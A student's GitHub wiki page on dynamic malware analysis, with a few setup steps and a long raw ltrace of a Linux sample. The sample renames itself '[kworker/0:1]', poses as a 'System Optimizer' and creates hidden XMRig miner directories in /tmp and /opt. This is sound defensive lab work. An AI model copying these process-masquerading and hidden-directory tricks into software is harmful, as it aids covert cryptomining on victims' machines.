For350‐LTrace‐DynamicAnalysis - ConnorEast/Tech-Journal GitHub Wiki
I had to enable ssh on my linux host and then transfer the file to the samples folder.
I first ran "bash linux_malware_analysis_container.sh samples/sample1" which opens up a remote podman instance for dynamic analysis
I then ran the Ltrace command
I then copied both the output of the raw ltrace output and the behavioral report to my main device. I opened a terminal with "CNTR + ALT +F3" and ran the following command syntax to copy the files ~~~ "podman cp [podmanID]:/tmp/ltrace_analysis/[FILENAME].txt [FileName].txt"
| Raw | Behavioral |
|---|---|
24 22:53:24.332988 strlen("samples/sample1") = 15 <0.000778>
24 22:53:24.333938 memset(0x7ffcf4dc980f, '\0', 15) = 0x7ffcf4dc980f <0.000356>
24 22:53:24.334458 strlen("[kworker/0:1]") = 13 <0.000507>
24 22:53:24.335098 strncpy(0x7ffcf4dc980f, "[kworker/0:1]", 13) = 0x7ffcf4dc980f <0.000480>
24 22:53:24.335724 puts("System Optimizer") = 17 <0.001239>
24 22:53:24.337131 printf("%s\n\n", "v2.1") = 6 <0.000937>
24 22:53:24.338232 puts("Optimizing system performance...") = 33 <0.000999>
24 22:53:24.339407 snprintf("mkdir -p /tmp/.xmrig 2>/dev/null", 1024, "mkdir -p %s 2>/dev/null", "/tmp/.xmrig") = 32 <0.000490>
24 22:53:24.340793 system("mkdir -p /tmp/.xmrig 2>/dev/null"
25 22:53:24.343363 --- Called exec() ---
25 22:53:24.363999 __errno_location() = 0x795957c026c8 <0.000363>
25 22:53:24.364573 getuid() = 0 <0.000517>
25 22:53:24.365238 getgid() = 0 <0.000387>
25 22:53:24.365750 _setjmp(0x653e6d4772e0, 0x7ffcead448e8, 0x7ffcead44910, 0x795957cf976b) = 0 <0.000408>
25 22:53:24.366339 getpid() = 25 <0.000397>
25 22:53:24.367079 sigfillset(~<31-32>) = 0 <0.000307>
25 22:53:24.367577 sigaction(SIGCHLD, { 0x653e6d46acd0, ~<31-32>, 0x57c02740, 0x795957e558d8 }, nil) = 0 <0.000521>
25 22:53:24.368323 geteuid() = 0 <0.000608>
25 22:53:24.369170 __ctype_b_loc() = 0x795957c026e0 <0.000347>
25 22:53:24.369690 __ctype_b_loc() = 0x795957c026e0 <0.000330>
25 22:53:24.370225 __ctype_b_loc() = 0x795957c026e0 <0.000329>
25 22:53:24.370721 __ctype_b_loc() = 0x795957c026e0 <0.000336>
25 22:53:24.371373 malloc(32) = 0x653e6f43e2a0 <0.000652>
25 22:53:24.372204 __ctype_b_loc() = 0x795957c026e0 <0.000360>
25 22:53:24.372719 __ctype_b_loc() = 0x795957c026e0 <0.000350>
25 22:53:24.373238 __ctype_b_loc() = 0x795957c026e0 <0.000360>
25 22:53:24.373754 __ctype_b_loc() = 0x795957c026e0 <0.000332>
25 22:53:24.374323 __ctype_b_loc() = 0x795957c026e0 <0.000371>
25 22:53:24.374896 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.375348 __ctype_b_loc() = 0x795957c026e0 <0.000396>
25 22:53:24.375942 __ctype_b_loc() = 0x795957c026e0 <0.000294>
25 22:53:24.376384 __ctype_b_loc() = 0x795957c026e0 <0.000372>
25 22:53:24.376956 __ctype_b_loc() = 0x795957c026e0 <0.000298>
25 22:53:24.377405 malloc(32) = 0x653e6f43e2d0 <0.000402>
25 22:53:24.377968 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.378410 __ctype_b_loc() = 0x795957c026e0 <0.000410>
25 22:53:24.378988 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.379431 __ctype_b_loc() = 0x795957c026e0 <0.000396>
25 22:53:24.380045 __ctype_b_loc() = 0x795957c026e0 <0.000303>
25 22:53:24.380528 malloc(32) = 0x653e6f43e300 <0.000363>
25 22:53:24.381051 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.381540 __ctype_b_loc() = 0x795957c026e0 <0.000365>
25 22:53:24.382075 __ctype_b_loc() = 0x795957c026e0 <0.000293>
25 22:53:24.382545 __ctype_b_loc() = 0x795957c026e0 <0.000354>
25 22:53:24.383078 __ctype_b_loc() = 0x795957c026e0 <0.000299>
25 22:53:24.383555 __ctype_b_loc() = 0x795957c026e0 <0.000334>
25 22:53:24.384087 __ctype_b_loc() = 0x795957c026e0 <0.000301>
25 22:53:24.384567 __ctype_b_loc() = 0x795957c026e0 <0.000324>
25 22:53:24.385090 __ctype_b_loc() = 0x795957c026e0 <0.000306>
25 22:53:24.385580 malloc(32) = 0x653e6f43e330 <0.000328>
25 22:53:24.386086 __ctype_b_loc() = 0x795957c026e0 <0.000316>
25 22:53:24.386580 __ctype_b_loc() = 0x795957c026e0 <0.000319>
25 22:53:24.387060 __ctype_b_loc() = 0x795957c026e0 <0.000342>
25 22:53:24.387579 __ctype_b_loc() = 0x795957c026e0 <0.000327>
25 22:53:24.388064 __ctype_b_loc() = 0x795957c026e0 <0.000482>
25 22:53:24.388799 malloc(32) = 0x653e6f43e360 <0.000849>
25 22:53:24.389901 __ctype_b_loc() = 0x795957c026e0 <0.000314>
25 22:53:24.390424 __ctype_b_loc() = 0x795957c026e0 <0.000333>
25 22:53:24.390950 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.391429 __ctype_b_loc() = 0x795957c026e0 <0.000337>
25 22:53:24.391957 __ctype_b_loc() = 0x795957c026e0 <0.000291>
25 22:53:24.392403 __ctype_b_loc() = 0x795957c026e0 <0.000356>
25 22:53:24.392952 malloc(32) = 0x653e6f43e390 <0.000291>
25 22:53:24.393385 __ctype_b_loc() = 0x795957c026e0 <0.000376>
25 22:53:24.393950 __ctype_b_loc() = 0x795957c026e0 <0.000295>
25 22:53:24.394394 __ctype_b_loc() = 0x795957c026e0 <0.000402>
25 22:53:24.394964 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.395407 __ctype_b_loc() = 0x795957c026e0 <0.000426>
25 22:53:24.396002 strchrnul(0x7ffcead46f7d, 61, 5, 61) = 0x7ffcead46f81 <0.000322>
25 22:53:24.396546 strchr("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" <0.001039>
25 22:53:24.398279 strchr("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/sbin:/usr/bin:/sbin:/bin" <0.000854>
25 22:53:24.399626 strchr("/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/bin:/sbin:/bin" <0.000682>
25 22:53:24.400695 strchr("/usr/bin:/sbin:/bin", ':') = ":/sbin:/bin" <0.000587>
25 22:53:24.401580 strchr("/sbin:/bin", ':') = ":/bin" <0.000495>
25 22:53:24.402317 strchr("/bin", ':') = nil <0.000384>
25 22:53:24.402876 __ctype_b_loc() = 0x795957c026e0 <0.000349>
25 22:53:24.403393 __ctype_b_loc() = 0x795957c026e0 <0.000326>
25 22:53:24.403911 __ctype_b_loc() = 0x795957c026e0 <0.000340>
25 22:53:24.404407 __ctype_b_loc() = 0x795957c026e0 <0.000324>
25 22:53:24.404923 __ctype_b_loc() = 0x795957c026e0 <0.000328>
25 22:53:24.405474 __ctype_b_loc() = 0x795957c026e0 <0.000372>
25 22:53:24.406012 __ctype_b_loc() = 0x795957c026e0 <0.000344>
25 22:53:24.406545 __ctype_b_loc() = 0x795957c026e0 <0.000328>
25 22:53:24.407037 __ctype_b_loc() = 0x795957c026e0 <0.000317>
25 22:53:24.407556 __ctype_b_loc() = 0x795957c026e0 <0.000329>
25 22:53:24.408045 __ctype_b_loc() = 0x795957c026e0 <0.000299>
25 22:53:24.408559 __ctype_b_loc() = 0x795957c026e0 <0.000335>
25 22:53:24.409056 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.409563 __ctype_b_loc() = 0x795957c026e0 <0.000341>
25 22:53:24.410064 __ctype_b_loc() = 0x795957c026e0 <0.000293>
25 22:53:24.410563 malloc(32) = 0x653e6f43e3c0 <0.000347>
25 22:53:24.411061 __ctype_b_loc() = 0x795957c026e0 <0.000292>
25 22:53:24.411535 malloc(32) = 0x653e6f43e3f0 <0.000385>
25 22:53:24.412075 strchrnul(0x653e6d477020, 61, 7, 61) = 0x653e6d477026 <0.000314>
25 22:53:24.412619 __errno_location() = 0x795957c026c8 <0.000378>
25 22:53:24.413159 __isoc23_strtoimax(0x653e6d477027, 0x7ffcead44570, 10, 61) = 1 <0.000365>
25 22:53:24.413678 __ctype_b_loc() = 0x795957c026e0 <0.000363>
25 22:53:24.414209 getppid() = 24 <0.000385>
25 22:53:24.414746 __vsnprintf_chk(0x653e6d477205, 27, 2, -1) = 2 <0.000431>
25 22:53:24.415346 malloc(32) = 0x653e6f43e420 <0.000330>
25 22:53:24.415865 strchrnul(0x7ffcead46827, 61, 4, 0) = 0x7ffcead4682a <0.000343>
25 22:53:24.416372 stat64(0x7ffcead4682b, 0x7ffcead446a0, 4, 0) = 0 <0.000483>
25 22:53:24.417062 stat64(0x653e6d47024f, 0x7ffcead44610, 0x7ffcead446a0, 0x795957d1c3ee) = 0 <0.000430>
25 22:53:24.417686 strdup("/home/app") = 0x653e6f43e450 <0.000491>
25 22:53:24.418336 __ctype_b_loc() = 0x795957c026e0 <0.000336>
25 22:53:24.418855 __ctype_b_loc() = 0x795957c026e0 <0.000350>
25 22:53:24.419373 __ctype_b_loc() = 0x795957c026e0 <0.000331>
25 22:53:24.419886 strchrnul(0x653e6d470194, 61, 0x795957db78c0, 0x70612f656d6f682f) = 0x653e6d470194 <0.000363>
25 22:53:24.420414 strlen("/home/app") = 9 <0.000465>
25 22:53:24.421054 malloc(14) = 0x653e6f43e470 <0.000375>
25 22:53:24.421628 __mempcpy_chk(0x653e6f43e470, 0x653e6d470191, 3, 14) = 0x653e6f43e473 <0.000351>
25 22:53:24.422145 mempcpy(0x653e6f43e474, 0x653e6f43e450, 9, 80) = 0x653e6f43e47d <0.000396>
25 22:53:24.422755 geteuid() = 0 <0.000385>
25 22:53:24.423311 getegid() = 0 <0.000413>
25 22:53:24.423888 sigaction(SIGINT, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000390>
25 22:53:24.424586 sigfillset(~<31-32>) = 0 <0.000325>
25 22:53:24.425083 sigaction(SIGINT, { 0x653e6d46acd0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000521>
25 22:53:24.425766 sigaction(SIGQUIT, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000410>
25 22:53:24.426507 sigfillset(~<31-32>) = 0 <0.000388>
25 22:53:24.427068 sigaction(SIGQUIT, { 0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000449>
25 22:53:24.427715 sigaction(SIGTERM, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000416>
25 22:53:24.428362 sigfillset(~<31-32>) = 0 <0.000369>
25 22:53:24.428942 sigaction(SIGTERM, { 0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000417>
25 22:53:24.429593 strlen("mkdir -p /tmp/.xmrig 2>/dev/null") = 32 <0.000704>
25 22:53:24.430466 memcpy(0x653e6d4774a8, "mkdir -p /tmp/.xmrig 2>/dev/null\0", 33) = 0x653e6d4774a8 <0.000676>
25 22:53:24.431312 malloc(136) = 0x653e6f43e490 <0.000331>
25 22:53:24.431844 strlen("mkdir -p /tmp/.xmrig 2>/dev/null") = 32 <0.000679>
25 22:53:24.432702 strcmp("mkdir", "for") = 7 <0.000489>
25 22:53:24.433347 strcmp("mkdir", "until") = -8 <0.000478>
25 22:53:24.434010 strcmp("mkdir", "in") = 4 <0.000404>
25 22:53:24.434586 strcmp("mkdir", "then") = -7 <0.000463>
25 22:53:24.435224 __ctype_b_loc() = 0x795957c026e0 <0.000325>
25 22:53:24.435700 __ctype_b_loc() = 0x795957c026e0 <0.000326>
25 22:53:24.436229 __ctype_b_loc() = 0x795957c026e0 <0.000322>
25 22:53:24.436833 __ctype_b_loc() = 0x795957c026e0 <0.000493>
25 22:53:24.437422 __ctype_b_loc() = 0x795957c026e0 <0.000333>
25 22:53:24.438032 strcspn("mkdir", "\210\203\201\202\204\206\207") = 5 <0.000526>
25 22:53:24.438706 mempcpy(0x653e6d4775c8, 0x653e6d4774d0, 6, 6) = 0x653e6d4775ce <0.000349>
25 22:53:24.439270 strpbrk(0x653e6d4775c8, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000388>
25 22:53:24.439852 strpbrk(0x653e6d4775c8, 0x653e6d4718e2, 8, 5) = 0 <0.000318>
25 22:53:24.440374 strchr("mkdir", '/') = nil <0.000454>
25 22:53:24.440982 strcmp("mkdir", "jobs") = 3 <0.000424>
25 22:53:24.441620 strcmp("mkdir", "test") = -7 <0.000441>
25 22:53:24.442217 strcmp("mkdir", "read") = -5 <0.000487>
25 22:53:24.442882 strcmp("mkdir", "printf") = -3 <0.000424>
25 22:53:24.443484 strcmp("mkdir", "local") = 1 <0.000501>
25 22:53:24.444140 strcspn("-p", "\210\203\201\202\204\206\207") = 2 <0.000447>
25 22:53:24.444764 mempcpy(0x653e6d4775e0, 0x653e6d4774f8, 3, 3) = 0x653e6d4775e3 <0.000356>
25 22:53:24.445286 strpbrk(0x653e6d4775e0, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000356>
25 22:53:24.445873 strpbrk(0x653e6d4775e0, 0x653e6d4718e2, 1, 16) = 0 <0.000323>
25 22:53:24.446362 strcspn("/tmp/.xmrig", "\210\203\201\202\204\206\207") = 11 <0.000615>
25 22:53:24.447131 mempcpy(0x653e6d4775f8, 0x653e6d477520, 12, 12) = 0x653e6d477604 <0.000346>
25 22:53:24.447636 strpbrk(0x653e6d4775f8, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000397>
25 22:53:24.448201 strpbrk(0x653e6d4775f8, 0x653e6d4718e2, 1, 16) = 0 <0.000346>
25 22:53:24.448713 malloc(16) = 0x653e6f43e520 <0.000383>
25 22:53:24.449256 strcspn("/dev/null", "\210\203\201\202\204\206\207") = 9 <0.000509>
25 22:53:24.449987 mempcpy(0x653e6d477640, 0x653e6d477578, 10, 10) = 0x653e6d47764a <0.000324>
25 22:53:24.450492 malloc(48) = 0x653e6f43e540 <0.000335>
25 22:53:24.451063 _setjmp(0x7ffcead44490, 3, 0xfffffffefffffffe, 0x653e6f43e570) = 0 <0.000332>
25 22:53:24.451584 open64("/dev/null", 577, 0666) = 3 <0.000619>
25 22:53:24.452419 fcntl(2, 0, 10, 2) = 10 <0.000457>
25 22:53:24.453042 close(2) = 0 <0.000442>
25 22:53:24.453629 fcntl(10, 2, 1, 0x795957d1b724) = 0 <0.000417>
25 22:53:24.454248 dup2(3, 2) = 2 <0.000401>
25 22:53:24.454818 close(3) = 0 <0.000358>
25 22:53:24.455362 strchr("mkdir", '/') = nil <0.000405>
25 22:53:24.455957 strcmp("mkdir", "jobs") = 3 <0.000450>
25 22:53:24.456585 strcmp("mkdir", "test") = -7 <0.000441>
25 22:53:24.457179 strcmp("mkdir", "read") = -5 <0.000489>
25 22:53:24.457844 strcmp("mkdir", "printf") = -3 <0.000423>
25 22:53:24.458463 strcmp("mkdir", "local") = 1 <0.000474>
25 22:53:24.459089 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001043>
25 22:53:24.460285 strlen("mkdir") = 5 <0.000513>
25 22:53:24.460959 mempcpy(0x653e6d477660, 0x7ffcead46f82, 15, 1480) = 0x653e6d47766f <0.000314>
25 22:53:24.461426 strcpy(0x653e6d477670, "mkdir") = 0x653e6d477670 <0.000485>
25 22:53:24.462064 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d477675, 0) = 0xffffffff <0.000433>
25 22:53:24.462661 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.000876>
25 22:53:24.463691 strlen("mkdir") = 5 <0.000431>
25 22:53:24.464273 mempcpy(0x653e6d477660, 0x7ffcead46f92, 14, 1480) = 0x653e6d47766e <0.000345>
25 22:53:24.464814 strcpy(0x653e6d47766f, "mkdir") = 0x653e6d47766f <0.000389>
25 22:53:24.465357 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d477674, 0) = 0xffffffff <0.000453>
25 22:53:24.466015 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000665>
25 22:53:24.466853 strlen("mkdir") = 5 <0.000399>
25 22:53:24.467406 mempcpy(0x653e6d477660, 0x7ffcead46fa1, 9, 1480) = 0x653e6d477669 <0.000344>
25 22:53:24.467995 strcpy(0x653e6d47766a, "mkdir") = 0x653e6d47766a <0.000474>
25 22:53:24.468680 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d47766f, 0) = 0xffffffff <0.000447>
25 22:53:24.469289 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000586>
25 22:53:24.470028 strlen("mkdir") = 5 <0.000350>
25 22:53:24.470567 mempcpy(0x653e6d477660, 0x7ffcead46fab, 8, 1480) = 0x653e6d477668 <0.000344>
25 22:53:24.471069 strcpy(0x653e6d477669, "mkdir") = 0x653e6d477669 <0.000362>
25 22:53:24.471610 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d47766e, 0) = 0 <0.000429>
25 22:53:24.472203 strlen("mkdir") = 5 <0.000366>
25 22:53:24.472710 malloc(29) = 0x653e6f43e580 <0.000322>
25 22:53:24.473181 __strcpy_chk(0x653e6f43e593, 0x653e6d4775c8, 10, 0x653e6f43e5a0) = 0x653e6f43e593 <0.000336>
25 22:53:24.473670 realloc(0, 160) = 0x653e6f43e5b0 <0.000334>
25 22:53:24.474158 sigfillset(~<31-32>) = 0 <0.000315>
25 22:53:24.474630 sigprocmask(SIG_UNBLOCK, ~<31-32>, nil) = 0 <0.000448>
25 22:53:24.475243 vfork(2, 0x7ffcead444d0, 0, 0x795957ca8f48
26 22:53:24.476488 <... vfork resumed> ) = 0 <0.001150>
26 22:53:24.476739 sigsetmask(0, 0, 0, 0x795957d1574c) = 0x7ffbfeef <0.000884>
26 22:53:24.477971 malloc(512) = 0x653e6f43e660 <0.000519>
26 22:53:24.478745 memcpy(0x653e6f43e668, "uo\324\352\374\177\0\0Fh\324\352\374\177\0\05h\324\352\374\177\0\0\336o\324\352\374\177\0\0jo\324\352\374\177\0\0}o\324\352\374\177\0\0Qh\324\352\374\177\0\0\277o\324\352\374\177\0\0", 64) = 0x653e6f43e668 <0.000953>
26 22:53:24.479954 strchr("mkdir", '/') = nil <0.000579>
26 22:53:24.480800 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001295>
26 22:53:24.482323 strlen("mkdir") = 5 <0.000706>
26 22:53:24.483234 mempcpy(0x653e6f43e6b8, 0x7ffcead46f82, 15, 1480) = 0x653e6f43e6c7 <0.000719>
26 22:53:24.484245 strcpy(0x653e6f43e6c8, "mkdir") = 0x653e6f43e6c8 <0.000708>
26 22:53:24.485162 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.001148>
26 22:53:24.486631 strlen("mkdir") = 5 <0.000602>
26 22:53:24.487517 mempcpy(0x653e6f43e6b8, 0x7ffcead46f92, 14, 1480) = 0x653e6f43e6c6 <0.000592>
26 22:53:24.488351 strcpy(0x653e6f43e6c7, "mkdir") = 0x653e6f43e6c7 <0.000883>
26 22:53:24.489521 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000999>
26 22:53:24.490726 strlen("mkdir") = 5 <0.000607>
26 22:53:24.491633 mempcpy(0x653e6f43e6b8, 0x7ffcead46fa1, 9, 1480) = 0x653e6f43e6c1 <0.000560>
26 22:53:24.492407 strcpy(0x653e6f43e6c2, "mkdir") = 0x653e6f43e6c2 <0.000572>
26 22:53:24.493185 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000759>
26 22:53:24.494259 strlen("mkdir") = 5 <0.000690>
26 22:53:24.495151 mempcpy(0x653e6f43e6b8, 0x7ffcead46fab, 8, 1480) = 0x653e6f43e6c0 <0.000552>
26 22:53:24.496027 strcpy(0x653e6f43e6c1, "mkdir") = 0x653e6f43e6c1 <0.000678>
26 22:53:24.497015 execve(0x653e6f43e6b8, 0x653e6d477620, 0x653e6f43e668, 0
26 22:53:24.498282 --- Called exec() ---
25 22:53:24.500378 <... vfork resumed> ) = 26 <0.025109>
25 22:53:24.500704 sigsetmask(0, 0, 0, 0x795957d1574c) = 0x7ffbfeef <0.000534>
25 22:53:24.501545 wait3(0x7ffcead443fc, 0, 0, 0
26 22:53:24.538073 strrchr("mkdir", '/') = nil <0.000743>
26 22:53:24.539040 setlocale(LC_ALL, "") = "C" <0.000609>
26 22:53:24.540067 bindtextdomain("coreutils", "/usr/share/locale") = "/usr/share/locale" <0.000899>
26 22:53:24.541558 textdomain("coreutils") = "coreutils" <0.000712>
26 22:53:24.542692 __cxa_atexit(0x57a82d633550, 0, 0x57a82d638008, 0) = 0 <0.000510>
26 22:53:24.543490 getopt_long(3, 0x7ffcc422dd78, "pm:vZ", 0x57a82d6379a0, nil) = 112 <0.000579>
26 22:53:24.544349 getopt_long(3, 0x7ffcc422dd78, "pm:vZ", 0x57a82d6379a0, nil) = -1 <0.000588>
26 22:53:24.545289 umask(00) = 022 <0.000638>
26 22:53:24.546215 umask(022) = 00 <0.000636>
26 22:53:24.547136 mkdir("/tmp", 0777) = -1 <0.000753>
26 22:53:24.548212 __errno_location() = 0x74d178ba36a0 <0.000496>
26 22:53:24.548967 chdir("/tmp") = 0 <0.000713>
26 22:53:24.551216 mkdir(".xmrig", 0777) = 0 <0.001390>
26 22:53:24.552845 __fpending(0x74d178e445c0, 0, 1, 1) = 0 <0.000457>
26 22:53:24.553625 fileno(0x74d178e445c0) = 1 <0.000502>
26 22:53:24.554386 __freading(0x74d178e445c0, 0, 1, 1) = 0 <0.000502>
26 22:53:24.555156 __freading(0x74d178e445c0, 0, 0, 1) = 0 <0.000446>
26 22:53:24.555845 fflush(0x74d178e445c0) = 0 <0.000419>
26 22:53:24.556544 fclose(0x74d178e445c0) = 0 <0.000621>
26 22:53:24.557426 __fpending(0x74d178e444e0, 0, 0x74d178e41e00, 0) = 0 <0.000595>
26 22:53:24.558307 fileno(0x74d178e444e0) = 2 <0.000551>
26 22:53:24.559138 __freading(0x74d178e444e0, 0, 0x74d178e41e00, 0) = 0 <0.000479>
26 22:53:24.559921 __freading(0x74d178e444e0, 0, 0, 0) = 0 <0.000519>
26 22:53:24.560749 fflush(0x74d178e444e0) = 0 <0.000584>
26 22:53:24.561639 fclose(0x74d178e444e0) = 0 <0.000721>
26 22:53:24.563176 +++ exited (status 0) +++
25 22:53:24.563479 --- SIGCHLD (Child exited) ---
25 22:53:24.563680 <... wait3 resumed> ) = 26 <0.062112>
25 22:53:24.563879 wait3(0x7ffcead443fc, 1, 0, 0) = 0xffffffff <0.000455>
25 22:53:24.564536 dup2(10, 2) = 2 <0.000434>
25 22:53:24.565155 close(10) = 0 <0.000399>
25 22:53:24.565689 free(0x653e6f43e540) = <0.000333>
25 22:53:24.566216 free(0x653e6f43e520) = <0.000323>
25 22:53:24.566683 free(0x653e6f43e660) = <0.000347>
25 22:53:24.567214 free(0x653e6f43e490) = <0.000338>
25 22:53:24.567698 _setjmp(0x7ffcead44680, 0x653e6f43e480, 0x653e6f43e, 0x653e6d4774a8) = 0 <0.000354>
25 22:53:24.568236 _setjmp(0x7ffcead44680, 0, 0x86f3e8153b8a645d, 0x653e6d4774a8) = 0 <0.000513>
25 22:53:24.568958 _exit(0
25 22:53:24.569657 +++ exited (status 0) +++
24 22:53:24.570030 --- SIGCHLD (Child exited) ---
24 22:53:24.570149 <... system resumed> ) = 0 <0.229366>
24 22:53:24.570290 snprintf("mkdir -p /opt/.xmr 2>/dev/null", 1024, "mkdir -p %s 2>/dev/null", "/opt/.xmr") = 30 <0.000546>
24 22:53:24.571761 system("mkdir -p /opt/.xmr 2>/dev/null"
27 22:53:24.574846 --- Called exec() ---
27 22:53:24.593888 __errno_location() = 0x7d31077f36c8 <0.000328>
27 22:53:24.594423 getuid() = 0 <0.000730>
27 22:53:24.595352 getgid() = 0 <0.000387>
27 22:53:24.595923 _setjmp(0x5b4e124a82e0, 0x7ffc2f6b2938, 0x7ffc2f6b2960, 0x7d31078ea76b) = 0 <0.000307>
27 22:53:24.596377 getpid() = 27 <0.000362>
27 22:53:24.596959 sigfillset(~<31-32>) = 0 <0.000286>
27 22:53:24.597401 sigaction(SIGCHLD, { 0x5b4e1249bcd0, ~<31-32>, 0x77f3740, 0x7d3107a468d8 }, nil) = 0 <0.000471>
27 22:53:24.598051 geteuid() = 0 <0.000348>
27 22:53:24.598568 __ctype_b_loc() = 0x7d31077f36e0 <0.000312>
27 22:53:24.599053 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.599505 __ctype_b_loc() = 0x7d31077f36e0 <0.000313>
27 22:53:24.599978 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.600420 malloc(32) = 0x5b4e140a92a0 <0.000641>
27 22:53:24.601214 __ctype_b_loc() = 0x7d31077f36e0 <0.000313>
27 22:53:24.601675 __ctype_b_loc() = 0x7d31077f36e0 <0.000323>
27 22:53:24.602153 __ctype_b_loc() = 0x7d31077f36e0 <0.000285>
27 22:53:24.602600 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.603064 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.603512 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.603977 __ctype_b_loc() = 0x7d31077f36e0 <0.000285>
27 22:53:24.604407 __ctype_b_loc() = 0x7d31077f36e0 <0.000300>
27 22:53:24.604876 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.605308 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.605763 malloc(32) = 0x5b4e140a92d0 <0.000305>
27 22:53:24.606215 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.606661 __ctype_b_loc() = 0x7d31077f36e0 <0.000319>
27 22:53:24.607135 __ctype_b_loc() = 0x7d31077f36e0 <0.000279>
27 22:53:24.607580 __ctype_b_loc() = 0x7d31077f36e0 <0.000308>
27 22:53:24.608098 __ctype_b_loc() = 0x7d31077f36e0 <0.000295>
27 22:53:24.608639 malloc(32) = 0x5b4e140a9300 <0.000340>
27 22:53:24.609130 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.609582 __ctype_b_loc() = 0x7d31077f36e0 <0.000315>
27 22:53:24.610050 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.610501 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.610963 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.611388 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.611865 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.612298 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.612796 __ctype_b_loc() = 0x7d31077f36e0 <0.000314>
27 22:53:24.613238 malloc(32) = 0x5b4e140a9330 <0.000297>
27 22:53:24.613674 __ctype_b_loc() = 0x7d31077f36e0 <0.000320>
27 22:53:24.614149 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.614594 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.615054 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.615499 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.615967 malloc(32) = 0x5b4e140a9360 <0.000279>
27 22:53:24.616383 __ctype_b_loc() = 0x7d31077f36e0 <0.000299>
27 22:53:24.616851 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.617286 __ctype_b_loc() = 0x7d31077f36e0 <0.000301>
27 22:53:24.617731 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.618193 __ctype_b_loc() = 0x7d31077f36e0 <0.000302>
27 22:53:24.618640 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.619105 malloc(32) = 0x5b4e140a9390 <0.000277>
27 22:53:24.619539 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.620000 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.620423 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.620905 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.621333 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.621806 strchrnul(0x7ffc2f6b3f7d, 61, 5, 61) = 0x7ffc2f6b3f81 <0.000302>
27 22:53:24.622274 strchr("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" <0.000979>
27 22:53:24.623996 strchr("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/sbin:/usr/bin:/sbin:/bin" <0.000889>
27 22:53:24.625357 strchr("/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/bin:/sbin:/bin" <0.000651>
27 22:53:24.626373 strchr("/usr/bin:/sbin:/bin", ':') = ":/sbin:/bin" <0.000538>
27 22:53:24.627181 strchr("/sbin:/bin", ':') = ":/bin" <0.000423>
